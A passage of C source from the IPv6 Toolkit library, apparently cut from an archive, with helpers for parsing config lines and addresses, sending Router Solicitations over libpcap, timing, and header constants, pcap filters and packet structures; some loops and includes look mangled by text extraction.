idata->linkhsize= sizeof(struct sll_linux); idata->mtu= MIN_IPV6_MTU; idata->flags|= IFACE_TUNNEL; } #endif else if(idata->type == DLT_NULL){ idata->linkhsize=4; idata->mtu= MIN_IPV6_MTU; idata->flags|= IFACE_TUNNEL; } else{ #ifdef DEBUG puts("Estoy en load_dst() y voy a imprimir error"); #endif printf("Error: Interface %s is not of any supported type (type= %u)\n", idata->iface, idata->type); return(FAILURE); } if(idata->fragh_f) idata->max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else idata->max_packet_size = idata->mtu; if(mode == LOAD_PCAP_ONLY) return(SUCCESS); if(!(idata->flags & IFACE_TUNNEL) && !(idata->flags & IFACE_LOOPBACK)){ if(ipv6_to_ether(idata->pfd, idata, &(idata->nhaddr), &(idata->nhhaddr)) != 1){ puts("Error while performing Neighbor Discovery for the Destination Address"); return(FAILURE); } } idata->hdstaddr= idata->nhhaddr; return(SUCCESS); } /* * sanitize_ipv4_prefix() * * Clears those bits in an IPv4 address that are not within a prefix length. */ void sanitize_ipv4_prefix(struct prefix4_entry *prefix4){ unsigned int clear, i; in_addr_t mask=0xffffffff; clear= 32-prefix4->len; for(i=0; i>1; for(i=0; iip.s_addr= prefix4->ip.s_addr & htonl(mask); } /* * Function: is_ip6_in_list() * * Checks whether an IPv6 address is present in an address list. */ int is_ip6_in_list(struct in6_addr *target, struct host_list *hlist){ unsigned int i; for(i=0; i < hlist->nhosts; i++) if(is_eq_in6_addr(target, &((hlist->host[i])->ip6))) return 1; return 0; } /* * Function: dec_to_hex() * * Convert a decimal number into a number that has the same representation in hexadecimal */ uint16_t dec_to_hex(uint16_t n){ uint16_t r=0; unsigned int d, i; /* The source number is truncated to the first four digits */ n= n%10000; d=1000; for(i=0; i<4; i++){ r= (r << 4) | (n/d); n= n%d; d=d/10; } return(r); } /* * Function: keyval() * * Obtains a (variable, value) pair from a line of text in "variable=value # comments" format */ int keyval(char *line, unsigned int len, char **key, char **val){ char *ptr; ptr= line; /* Skip initial spaces (e.g. " variable=value") */ while( (*ptr==' ' || *ptr=='\t') && ptr < (line+len)) ptr++; /* If we got to end of line or there is a comment or equal sign, there is no (variable, value) pair) */ if(ptr==(line+len) || *ptr=='#' || *ptr=='=' || *ptr=='\r' || *ptr=='\n') return 0; *key=ptr; /* The variable name is everything till (and excluding) the first separator character (e.g., space or tab) */ while( (*ptr!=' ' && *ptr!='\t' && *ptr!='\r' && *ptr!='\n' && *ptr!='#' && *ptr!='=') && ptr < (line+len)) ptr++; /* If the variable name is followed by a comment sign, or occupies the entire line, there's an error in the config file (i.e., there is no "variable=value" pair) */ if(ptr==(line+len) || *ptr=='#' || *ptr=='\r' || *ptr=='\n') return -1; if(*ptr==' ' || *ptr=='\t'){ /* The variable name is followed by spaces -- skip them, and find the "equal to" sign */ *ptr=0; /* NULL-terminate the key */ ptr++; while(ptr<(line+len) && (*ptr==' ' || *ptr=='\t')) ptr++; if(ptr==(line+len) || *ptr!='=') return -1; ptr++; }else{ /* The variable name is followed by the "equal to" sign */ *ptr=0; ptr++; } /* If the equal sign is followed by spaces, skip them */ while( (*ptr==' ' || *ptr=='\t') && ptr<(line+len)) ptr++; /* We found the "value" in the "variable=value" pair */ *val=ptr; /* The value is everthing till (and excluding) the first separator character */ while( (*ptr!='#' && *ptr!='\r' && *ptr!='\n' && *ptr!='\t' && *ptr!='=' && *ptr!=' ') && ptr < (line+len)) ptr++; /* If the value string was actually "empty", we return an error */ if(ptr == *val) return(-1); *ptr=0; return(1); } /* * Function: address_contains_ranges() * * Checks whether a string contains ranges in the form YYYY-ZZZZ. A string that contains both ranges and a * /length prefix is considered invalid. */ int address_contains_ranges(char *ptr){ unsigned char slash_f=0, dash_f=0; unsigned int i=0; while(i <= (MAX_RANGE_STR_LEN) && *ptr){ if(*ptr == '-') dash_f=1; if(*ptr=='/') slash_f=1; ptr++; i++; } /* If the string contains both slashes and dashes, it is an error */ if(dash_f){ if(slash_f) return(-1); else return(1); } else{ return(0); } } /* * Function: address_contains_colons() * * Checks whether a string contains colons. This is a trivial way to differentiate between * domain names and IPv6 addresses. */ int address_contains_colons(char *ptr){ unsigned char colon_f=0; unsigned int i=0; while(i <= (MAX_RANGE_STR_LEN) && *ptr){ if(*ptr == ':') colon_f=1; ptr++; i++; } if(colon_f) return(1); else return(0); } /* * Function: read_prefix() * * Obtain a pointer to the beginning of non-blank text, and zero-terminate that text upon space or comment. */ int read_prefix(char *line, unsigned int len, char **start){ char *end; *start=line; while( (*start < (line + len)) && (**start==' ' || **start=='\t' || **start=='\r' || **start=='\n')){ (*start)++; } if( *start == (line + len)) return(0); if( **start == '#') return(0); end= *start; while( (end < (line + len)) && !(*end==' ' || *end=='\t' || *end=='#' || *end=='\r' || *end=='\n')) end++; *end=0; return(1); } /* * Function: read_ipv6_address() * * Obtains an IPv6 address (struct in6_addr) from a line of text in "IPv6_address # comments" format */ int read_ipv6_address(char *line, unsigned int len, struct in6_addr *iid){ char *ptr, *ipv6addr; ptr= line; /* Skip initial spaces (e.g. " IPv6_address") */ while( (*ptr==' ' || *ptr=='\t') && ptr < (line+len)) ptr++; /* If we got to end of line or there is a comment or equal sign, there is no IPv6 address */ if(ptr==(line+len) || *ptr=='#' || *ptr=='=' || *ptr=='\r' || *ptr=='\n') return 0; ipv6addr=ptr; /* The IPv6 address is everything till (and excluding) the first separator character (e.g., space or tab) */ while( (*ptr!=' ' && *ptr!='\t' && *ptr!='\r' && *ptr!='\n' && *ptr!='#' && *ptr!='=') && ptr < (line+len)) ptr++; /* NULL-terminate the ASCII-encoded IPv6 address */ *ptr=0; if ( inet_pton(AF_INET6, ipv6addr, iid) <= 0){ return(-1); } return(1); } /* * Function: print_local_addrs() * * Debugging function to print all local addresses (starting from a struct iface_data *) */ int print_local_addrs(struct iface_data *idata){ unsigned int i, j; char pv6addr[INET6_ADDRSTRLEN]; char plinkaddr[ETHER_ADDR_PLEN]; puts("List of local interfaces/addresses"); for(i=0; i < idata->iflist.nifaces; i++){ if(ether_ntop(&((idata->iflist).ifaces[i].ether), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Name: %s\tIndex: %d\t Address: %s\n", (idata->iflist.ifaces[i]).iface, (idata->iflist.ifaces[i]).ifindex, plinkaddr); puts("Link-local addresses:"); for(j=0; j < idata->iflist.ifaces[i].ip6_local.nprefix; j++){ if(inet_ntop(AF_INET6, idata->iflist.ifaces[i].ip6_local.prefix[j], pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } printf("\t%s\n", pv6addr); } puts("Global addresses:"); for(j=0; j < idata->iflist.ifaces[i].ip6_global.nprefix; j++){ if(inet_ntop(AF_INET6, idata->iflist.ifaces[i].ip6_global.prefix[j], pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 address to presentation format"); exit(EXIT_FAILURE); } printf("\t%s\n", pv6addr); } puts(""); } return(SUCCESS); } /* * Function: find_ipv6_router() * * Finds a local router (by means of Neighbor Discovery) */ int find_ipv6_router(pcap_t *pfd, struct ether_addr *hsrcaddr, struct in6_addr *srcaddr, \ struct ether_addr *result_ether, struct in6_addr *result_ipv6){ struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct nd_router_advert *pkt_ra; unsigned char *pkt_end; unsigned char *ptr, *prev_nh; int r; size_t nw; unsigned char buffer[65556]; unsigned int rs_max_packet_size; struct ether_header *ether; unsigned char *v6buffer; struct ip6_hdr *ipv6; struct nd_router_solicit *rs; struct nd_opt_slla *sllaopt; volatile unsigned int tries=0; volatile unsigned int foundrouter=0; struct sigaction new_sig, old_sig; rs_max_packet_size = ETH_DATA_LEN; ether = (struct ether_header *) buffer; v6buffer = buffer + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; if(pcap_compile(pfd, &pcap_filter, PCAP_ICMPV6_RA_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(pfd)); return(-1); } if(pcap_setfilter(pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(pfd)); return(-1); } pcap_freecode(&pcap_filter); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= *srcaddr; if ( inet_pton(AF_INET6, ALL_ROUTERS_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ puts("inet_pton(): Error converting All Routers address from presentation to network format"); return(-1); } ether->src = *hsrcaddr; if(ether_pton(ETHER_ALLROUTERS_LINK_ADDR, &(ether->dst), sizeof(struct ether_addr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); return(-1); } ether->ether_type = htons(ETHERTYPE_IPV6); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); *prev_nh = IPPROTO_ICMPV6; ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if( (ptr+sizeof(struct nd_router_solicit)) > (v6buffer+rs_max_packet_size)){ puts("Packet too large while inserting Router Solicitation header"); return(-1); } rs= (struct nd_router_solicit *) (ptr); rs->nd_rs_type = ND_ROUTER_SOLICIT; rs->nd_rs_code = 0; rs->nd_rs_reserved = 0; ptr += sizeof(struct nd_router_solicit); sllaopt = (struct nd_opt_slla *) ptr; if( (ptr+sizeof(struct nd_opt_slla)) > (v6buffer+rs_max_packet_size)){ puts("RS message too large while processing source link-layer addresss opt."); return(-1); } sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, &(hsrcaddr->a), ETH_ALEN); ptr += sizeof(struct nd_opt_slla); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); rs->nd_rs_cksum = 0; rs->nd_rs_cksum = in_chksum(v6buffer, rs, ptr-((unsigned char *)rs), IPPROTO_ICMPV6); /* We set the signal handler, and the anchor for siglongjump() */ canjump=0; memset(&new_sig, 0, sizeof(struct sigaction)); sigemptyset(&new_sig.sa_mask); new_sig.sa_handler= &sig_alarm; alarm(0); if( sigaction(SIGALRM, &new_sig, &old_sig) == -1){ puts("Error setting up 'Alarm' signal"); return(-1); } if(sigsetjmp(env, 1) != 0) tries++; canjump=1; while(tries<3 && !foundrouter){ if((nw=pcap_inject(pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(pfd)); return(-1); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); return(-1); } alarm(1); while(!foundrouter){ if( (r=pcap_next_ex(pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(pfd)); exit(EXIT_FAILURE); } else if(r == 0 || pktdata == NULL){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_ra = (struct nd_router_advert *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_ra + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ra + pkt_ipv6->ip6_plen; /* Discard the packet if it is not of the minimum size to contain a Neighbor Advertisement message with a source link-layer address option */ if( (pkt_end - (unsigned char *) pkt_ra) < (sizeof(struct nd_router_advert) + \ sizeof(struct nd_opt_slla))) continue; /* Neighbor Discovery packets must have a Hop Limit of 255 */ if(pkt_ipv6->ip6_hlim != 255) continue; /* Check that the IPv6 packet encapsulates an ICMPv6 message */ if(pkt_ipv6->ip6_nxt != IPPROTO_ICMPV6) continue; /* Check that the ICMPv6 type corresponds to RA */ if(pkt_ra->nd_ra_type != ND_ROUTER_ADVERT) continue; /* Check that the ICMPv6 code is 0 */ if(pkt_ra->nd_ra_code != 0) continue; /* Check that the IPv6 Source Address of the Router Advertisement is an IPv6 link-local address. */ if(!IN6_IS_ADDR_LINKLOCAL(&(pkt_ipv6->ip6_src))) continue; /* Check that that the Destination Address of the Router Advertisement is either the one that we used for sending the Router Solicitation message or a multicast address (typically the all-nodes) */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(ipv6->ip6_src)) && !IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_dst))) continue; /* Check that the ICMPv6 checksum is correct. If the received checksum is valid, and we compute the checksum over the received packet (including the Checkdum field) the result is 0. Otherwise, the packet has been corrupted. */ if(in_chksum(pkt_ipv6, pkt_ra, pkt_end- (unsigned char *)pkt_ra, IPPROTO_ICMPV6) != 0) continue; ptr= (unsigned char *) pkt_ra + sizeof(struct nd_router_advert); /* Process Router Advertisement options */ while( (ptr+sizeof(struct nd_opt_slla)) <= pkt_end && (*(ptr+1) != 0)){ if(*ptr == ND_OPT_SOURCE_LINKADDR){ if( (*(ptr+1) * 8) != sizeof(struct nd_opt_tlla)) break; /* Got a response, so we shouln't time out */ alarm(0); /* Save the link-layer address */ *result_ether= *(struct ether_addr *) (ptr+2); *result_ipv6= pkt_ipv6->ip6_src; foundrouter=1; break; } ptr= ptr + *(ptr+1) * 8; } /* Processing options */ } /* Processing packets */ } /* Resending Router Solicitations */ if( sigaction(SIGALRM, &old_sig, NULL) == -1){ puts("Error setting up 'Alarm' signal"); return(-1); } if(foundrouter) return 0; else return -1; } /* * Function: timeval timeval_sub() * * Substract two struct timeval */ struct timeval timeval_sub(struct timeval *t2, struct timeval *t1){ struct timeval result; if(t1->tv_usec > t2->tv_usec){ result.tv_sec= t2->tv_sec - t1->tv_sec - 1; result.tv_usec= 1000000 - t1->tv_usec + t2->tv_usec ; } else{ result.tv_sec= t2->tv_sec - t1->tv_sec; result.tv_usec= t2->tv_usec - t1->tv_usec ; } return(result); } /* * Function: time_diff_ms() * * Return the difference between two struct timeval (in msec) */ float time_diff_ms(struct timeval *t2, struct timeval *t1){ /* XXX: Need to review!! */ float result; result= t2->tv_sec * 1000 - t1->tv_sec * 1000 + (float ) t2->tv_usec / 1000 - (float) t1->tv_usec / 1000; return(result); } /* * Function: dump_hex() * * Prints a buffer in hexadecimal (mostly for debugging purposes) */ void dump_hex(void* ptr, size_t s){ unsigned int i; for(i=0; i < s; i++){ printf("%02x ", *( ((uint8_t *)ptr)+i) ); } puts(""); } /* * Function: get_ipv6_target() * * Obtains the first IPv6 address and the canonical name for a given domain * * Return value: 0: success, -1: name conversion error, 1: non-suitable address */ int get_ipv6_target(struct target_ipv6 *target){ struct addrinfo hints, *res, *ptr; memset(&hints, 0, sizeof(hints)); hints.ai_flags= (target->flags)?AI_CANONNAME:0; hints.ai_family= AF_INET6; hints.ai_canonname = NULL; hints.ai_addr = NULL; hints.ai_next = NULL; if( (target->res = getaddrinfo(target->name, NULL, &hints, &res)) != 0){ return(-1); } /* If canonname is non-NULL, the canonic name is required */ if(target->flags){ if(res != NULL && res->ai_canonname != NULL){ strncpy( target->canonname, res->ai_canonname, NI_MAXHOST); target->canonname[NI_MAXHOST-1]=0; } else{ target->canonname[0]=0; target->flags=0; } } for(ptr=res; ptr != NULL; ptr=ptr->ai_next){ if(ptr->ai_family != AF_INET6) continue; if(ptr->ai_addrlen != sizeof(struct sockaddr_in6)) continue; if(ptr->ai_addr == NULL) continue; memcpy( &(target->ip6), &(( (struct sockaddr_in6 *)ptr->ai_addr)->sin6_addr), sizeof(struct in6_addr)); break; } freeaddrinfo(res); if(ptr != NULL) return(0); else return(1); } /* * Function: is_iid_null() * * Checks whether the IID of a prefix is set to all-zeroes * */ int is_iid_null(struct in6_addr *prefix, uint8_t len){ unsigned int skip, i; uint32_t mask; skip= len/32; if(len%32){ mask= 0xffffffff; mask= mask >> (len%32); if(prefix->s6_addr32[skip] & htonl(mask)) return(FALSE); skip=skip+1; } for(i=skip; i<4; i++){ if(prefix->s6_addr32[i]) return(FALSE); } return TRUE; } ipv6toolkit-2.0+ds.1/tools/libipv6.h000066400000000000000000000751711254360455000173110ustar00rootroot00000000000000#ifndef lib_pcap_pcap_h #include #endif #include #include /* For IFNAMSIZ */ /* General constants */ #define SUCCESS 1 #define FAILURE 0 #define TRUE 1 #define FALSE 0 #define ADDR_AUTO 2 #define LUI long unsigned int #define CHAR_CR 0x0d #define CHAR_LF 0x0a #define DATA_BUFFER_LEN 1000 #define LINE_BUFFER_SIZE 80 #define MAX_STRING_SIZE 10 /* For limiting strncmp */ #define MAX_RANGE_STR_LEN 79 /* For function that check for address ranges in string */ #define ETH_ALEN 6 /* Octets in one ethernet addr */ #define ETH_HLEN 14 /* Total octets in header. */ #define ETH_DATA_LEN 1500 /* Max. octets in payload */ #define ETHERTYPE_IPV6 0x86dd /* IP protocol version 6 */ #define ETHER_ADDR_LEN ETH_ALEN /* size of ethernet addr */ #define ETHER_HDR_LEN ETH_HLEN /* total octets in header */ #define ETHER_ADDR_PLEN 18 /* Includes termination byte */ #define ETHER_ALLNODES_LINK_ADDR "33:33:00:00:00:01" #define ETHER_ALLROUTERS_LINK_ADDR "33:33:00:00:00:02" #define MIN_IPV6_HLEN 40 #define MIN_IPV6_MTU 1280 #define MIN_TCP_HLEN 20 #define MIN_UDP_HLEN 8 #define MIN_ICMP6_HLEN 8 #define MIN_HBH_LEN 8 #define MIN_EXT_HLEN 8 #define SLLA_OPT_LEN 1 #define TLLA_OPT_LEN 1 #define MIN_DST_OPT_HDR_SIZE 8 #define MAX_SLLA_OPTION 100 #define MAX_TLLA_OPTION 256 #define IFACE_LENGTH IFNAMSIZ #define ALL_NODES_MULTICAST_ADDR "FF02::1" #define ALL_ROUTERS_MULTICAST_ADDR "FF02::2" #define LOOPBACK_ADDR "::1" #define SOLICITED_NODE_MULTICAST_PREFIX "FF02:0:0:0:0:1:FF00::" /* Support for IPv6 extension headers */ #define FRAG_HDR_SIZE 8 #define MAX_IPV6_PAYLOAD 65535 #define MAX_DST_OPT_HDR 256 #define MAX_DST_OPT_U_HDR MAX_DST_OPT_HDR #define MAX_HBH_OPT_HDR MAX_DST_OPT_HDR /* Filter Constants */ #define MAX_BLOCK_SRC 50 #define MAX_BLOCK_DST 50 #define MAX_BLOCK_TARGET 50 #define MAX_BLOCK_LINK_SRC 50 #define MAX_BLOCK_LINK_DST 50 struct filters{ /* Block Filters */ struct in6_addr *blocksrc; struct in6_addr *blockdst; struct in6_addr *blocktarget; uint8_t *blocksrclen; uint8_t *blockdstlen; uint8_t *blocktargetlen; struct ether_addr *blocklinksrc; struct ether_addr *blocklinkdst; unsigned int nblocksrc; unsigned int nblockdst; unsigned int nblocktarget; unsigned int nblocklinksrc; unsigned int nblocklinkdst; /* Accept Filters */ struct in6_addr *acceptsrc; struct in6_addr *acceptdst; struct in6_addr *accepttarget; uint8_t *acceptsrclen; uint8_t *acceptdstlen; uint8_t *accepttargetlen; unsigned char acceptfilters_f; struct ether_addr *acceptlinksrc; struct ether_addr *acceptlinkdst; unsigned int nacceptsrc; unsigned int nacceptdst; unsigned int naccepttarget; unsigned int nacceptlinksrc; unsigned int nacceptlinkdst; }; #define MAX_ACCEPT_SRC 50 #define MAX_ACCEPT_DST 50 #define MAX_ACCEPT_TARGET 50 #define MAX_ACCEPT_LINK_SRC 50 #define MAX_ACCEPT_LINK_DST 50 #define ACCEPTED 1 #define BLOCKED 0 /* Constants used with the libcap functions */ #define PCAP_SNAP_LEN 65535 #define PCAP_PROMISC 1 #define PCAP_OPT 1 #ifndef PCAP_NETMASK_UNKNOWN #define PCAP_NETMASK_UNKNOWN 0xffffffff #endif #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) || defined(sun) || defined(__sun) #define PCAP_TIMEOUT 1 #else #define PCAP_TIMEOUT 0 #endif #define PCAP_IPV6_FILTER "ip6" #define PCAP_TCPV6_FILTER "ip6 and tcp" #define PCAP_UDPV6_FILTER "ip6 and udp" #define PCAP_ICMPV6_FILTER "icmp6" #define PCAP_ICMPV6_NA_FILTER "icmp6 and ip6[7]==255 and ip6[40]==136 and ip6[41]==0" /* XXX: Should check the na6 code: we fail to receive packets (Ubuntu, at least) when this filter is set #define PCAP_ICMPV6_NS_FILTER "icmp6 and ((ip6[7]==255 and ip6[40]==135 and ip6[41]==0) or ip6[40]==4)" */ #define PCAP_ICMPV6_NS_FILTER "ip6" #define PCAP_ICMPV6_RA_FILTER "icmp6 and ip6[7]==255 and ip6[40]==134 and ip6[41]==0" #define PCAP_ICMPV6_RANS_FILTER "icmp6 and ip6[7]==255 and ((ip6[40]==134 and ip6[41]==0) or (ip6[40]==135 and ip6[41]==0))" #define PCAP_TCPIPV6_NS_FILTER "ip6 and (tcp or (icmp6 and ip6[7]==255 and ip6[40]==135 and ip6[41]==0))" /* #define PCAP_TCPIPV6_NS_FILTER "ip6" */ #define PCAP_UDPIPV6_NS_FILTER "ip6 and (udp or (icmp6 and ip6[7]==255 and ip6[40]==135 and ip6[41]==0))" #define PCAP_ICMPV6_NI_QUERY "icmp6 and ip6[40]==139" #define PCAP_ICMPV6_NI_REPLY "icmp6 and ip6[40]==140" #define PCAP_NOPACKETS_FILTER "not ip and not ip6 and not arp" #define PCAP_ICMPV6NSEXCEEDED_FILTER "icmp6 and ((ip6[40]==3 and ip6[41]==1) or (ip6[40]==129 and ip6[41]==0))" #define PCAP_ICMPV6_RS_FILTER "icmp6 and ip6[7]==255 and ip6[40]==133 and ip6[41]==0" #define PCAP_ICMPV6_NSECHOEXCEEDED_FILTER "icmp6 and ((ip6[40]==3 and ip6[41]==1) or (ip6[40]==129 and ip6[41]==0) or (ip6[7]==255 and ip6[40]==135 and ip6[41]==0))" /* Filter to receive Neighbor Solicitations and Fragmented packets */ #define PCAP_ICMPV6NSFRAG_FILTER "(ip6[7]==255 and icmp6 and ip6[40]==135 and ip6[41]==0) or (ip6 and ip6[6]==44)" #define PCAP_NSTCP_FILTER "(ip6[7]==255 and icmp6 and ip6[40]==135 and ip6[41]==0) or (ip6 and ip6[6]==6)" /* Filter to receive Neighbor Solicitations and Fragmented packets */ #define PCAP_ICMPV6NSFRAG_FILTER "(ip6[7]==255 and icmp6 and ip6[40]==135 and ip6[41]==0) or (ip6 and ip6[6]==44)" /* #define PCAP_ICMPV6NSEXCEEDED_FILTER "icmp6 and ((ip6[7]==255 and ip6[40]==135 and ip6[41]==0) or (ip6[40]==3 and ip6[41]==1) or (ip6[40]==129 and ip6[41]==0))" */ #define PCAP_TCPIPV6_FILTER "ip6 and tcp" /* Originally from scan6.h */ #define PCAP_ICMPV6_NA_FILTER "icmp6 and ip6[7]==255 and ip6[40]==136 and ip6[41]==0" #define PCAP_ICMPV6_RANS_FILTER "icmp6 and ip6[7]==255 and ((ip6[40]==134 and ip6[41]==0) or (ip6[40]==135 and ip6[41]==0))" #define PCAP_ICMPV6_ERNS_FILTER "icmp6 and ((ip6[40]==129 and ip6[41]==0) or (ip6[40]==135 and ip6[41]==0))" #define PCAP_ICMPV6_ERRORNS_FILTER "icmp6 and ((ip6[40]==4) or (ip6[40]==135 and ip6[41]==0))" #define PCAP_ICMPV6_ERQNSNA_FILTER "icmp6 and ((ip6[40]==129 and ip6[41]==0) or ((ip6[40]==135 or ip6[40]==136) and ip6[41]==0 and ip6[7]==255))" #define PCAP_ICMPV6_ERRORNSNA_FILTER "icmp6 and ((ip6[40]==4) or ((ip6[7]==255 and ip6[41]==0) and (ip6[40]==135 or ip6[40]==136)))" #define PCAP_TCP_NSNA_FILTER "(ip6 and tcp) or (icmp6 and ip6[7]==255 and ip6[41]==0 and (ip6[40]==135 or ip6[40]==136))" #define PCAP_UDP_NSNA_FILTER "(ip6 and (udp or icmp6)) or (icmp6 and ip6[7]==255 and ip6[41]==0 and (ip6[40]==135 or ip6[40]==136))" #define PCAP_TCP_UDP_NSNA_FILTER "(ip6 and (tcp or udp or icmp6)) or (icmp6 and ip6[7]==255 and ip6[41]==0 and (ip6[40]==135 or ip6[40]==136))" /* Constants used for Router Discovery */ #define MAX_PREFIXES_ONLINK 100 #define MAX_PREFIXES_AUTO 100 #define MAX_LOCAL_ADDRESSES 256 /* Constants used for sending Router Advertisements */ #define MAX_PREFIX_OPTION 256 #define MAX_ROUTE_OPTION MAX_PREFIX_OPTION #define MAX_MTU_OPTION MAX_PREFIX_OPTION #define MAX_RDNSS_OPTION MAX_PREFIX_OPTION #define MAX_RDNSS_OPT_ADDRS 127 #define DEFAULT_PREFIX_PREFERRED 0xffffffff #define DEFAULT_PREFIX_VALID 0xffffffff #define DEFAULT_CURHOP 255 #define DEFAULT_ROUTER_LIFETIME 9000 #define DEFAULT_ROUTER_REACHABLE 0Xffffffff #define DEFAULT_ROUTER_RETRANS 4000 #define DEFAULT_ROUTER_PREFERENCE 0x08 #define DEFAULT_RDNSS_LIFETIME 9000 #define DEFAULT_ROUTE_OPT_LIFE 0xffffffff #define DEFAULT_ROUTE_OPT_PREF 0x08 /* For Fragment ID or Flow Label assessment */ #define ID_ASSESS_TIMEOUT 5 #define NSAMPLES 40 #define FIXED_ORIGIN 1 #define MULTI_ORIGIN 2 struct ether_addr{ uint8_t a[ETHER_ADDR_LEN]; } __attribute__ ((__packed__)); /* For DLT_NULL encapsulation */ struct dlt_null { uint32_t family; /* Protocol Family */ } __attribute__ ((__packed__)); /* IPv6 options Most stacks define "struct ip_opt" for this purpose. But ias has proved to be painful to use this structure in Mac OS, since its definition seems to depend on the Xcode version, which is hard (if at all possible) to check at compile time. As a workaround, we define our own data type for IPv6 options */ struct ip6_option{ uint8_t ip6o_type; uint8_t ip6o_len; } __attribute__ ((__packed__)); struct nd_opt_slla{ uint8_t type; uint8_t length; uint8_t address[6]; } __attribute__ ((__packed__)); struct nd_opt_tlla{ uint8_t type; uint8_t length; uint8_t address[6]; } __attribute__ ((__packed__)); struct nd_opt_route_info_l{ uint8_t nd_opt_ri_type; uint8_t nd_opt_ri_len; uint8_t nd_opt_ri_prefix_len; uint8_t nd_opt_ri_rsvd_pref_rsvd; uint32_t nd_opt_ri_lifetime; struct in6_addr nd_opt_ri_prefix; } __attribute__ ((__packed__)); struct nd_opt_rdnss_l{ uint8_t nd_opt_rdnss_type; uint8_t nd_opt_rdnss_len; uint16_t nd_opt_rdnss_rsvd; uint32_t nd_opt_rdnss_lifetime; struct in6_addr nd_opt_rdnss_addr[]; } __attribute__ ((__packed__)); struct ipv6pseudohdr{ struct in6_addr srcaddr; struct in6_addr dstaddr; uint32_t len; uint8_t zero[3]; uint8_t nh; } __attribute__ ((__packed__)); /* 10Mb/s ethernet header */ struct ether_header{ struct ether_addr dst; /* destination eth addr */ struct ether_addr src; /* source ether addr */ uint16_t ether_type; /* packet type ID field */ } __attribute__ ((__packed__)); /* Generic extension header. */ struct ip6_eh{ uint8_t eh_nxt; /* next header. */ uint8_t eh_len; /* length in units of 8 octets. */ } __attribute__ ((__packed__)); /* Solaris does not define this one */ #if defined(sun) || defined(__sun) struct ip6_ext { uint8_t ip6e_nxt; uint8_t ip6e_len; } __attribute__ ((__packed__)); #endif typedef uint32_t tcp_seq; /* XXX: To be removed * Definitions required for OSX 10.6.8 with Xcode 3.2.6 */ /* #ifndef __BYTE_ORDER__ #ifdef __LITTLE_ENDIAN__ #define __BYTE_ORDER__ __LITTLE_ENDIAN__ #elif defined(__BIG_ENDIAN__) #define __BYTE_ORDER__ __BIG_ENDIAN__ #endif #endif #ifndef __ORDER_LITTLE_ENDIAN__ #define __ORDER_LITTLE_ENDIAN__ __LITTLE_ENDIAN__ #endif #ifndef __ORDER_BIG_ENDIAN__ #define __ORDER_BIG_ENDIAN__ __BIG_ENDIAN__ #endif */ /* Different OSes employ different constants fo specifying the byte order. We employ the native Linux one, and if not available, map the BSD, Mac OS, or Solaris into the Linux one. */ #ifndef __BYTE_ORDER #define __LITTLE_ENDIAN 1234 #define __BIG_ENDIAN 4321 /* Mac OS */ #if defined (__BYTE_ORDER__) # if __BYTE_ORDER__ == __ORDER_LITTLE_ENDIAN__ #define __BYTE_ORDER __LITTLE_ENDIAN #elif __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ #define __BYTE_ORDER __BIG_ENDIAN #endif /* BSD */ #elif defined(_BYTE_ORDER) #if _BYTE_ORDER == _LITTLE_ENDIAN #define __BYTE_ORDER __LITTLE_ENDIAN #elif _BYTE_ORDER == _BIG_ENDIAN #define __BYTE_ORDER __BIG_ENDIAN #endif /* XXX: Solaris. There should be a better constant on which to check the byte order */ #elif defined(sun) || defined (__sun) #if defined(_BIT_FIELDS_LTOH) #define __BYTE_ORDER __LITTLE_ENDIAN #else #define __BYTE_ORDER __IG_ENDIAN #endif #endif #endif /* BSD definition */ /* * TCP header. * Per RFC 793, September, 1981. */ struct tcp_hdr { uint16_t th_sport; /* source port */ uint16_t th_dport; /* destination port */ tcp_seq th_seq; /* sequence number */ tcp_seq th_ack; /* acknowledgement number */ #if __BYTE_ORDER == __LITTLE_ENDIAN uint32_t th_x2:4, /* (unused) */ th_off:4; /* data offset */ #endif # if __BYTE_ORDER == __BIG_ENDIAN uint32_t th_off:4, /* data offset */ th_x2:4; /* (unused) */ #endif uint8_t th_flags; #define TH_FIN 0x01 #define TH_SYN 0x02 #define TH_RST 0x04 #define TH_PUSH 0x08 #define TH_ACK 0x10 #define TH_URG 0x20 #define TH_ECE 0x40 #define TH_CWR 0x80 uint16_t th_win; /* window */ uint16_t th_sum; /* checksum */ uint16_t th_urp; /* urgent pointer */ }; /* 0 7 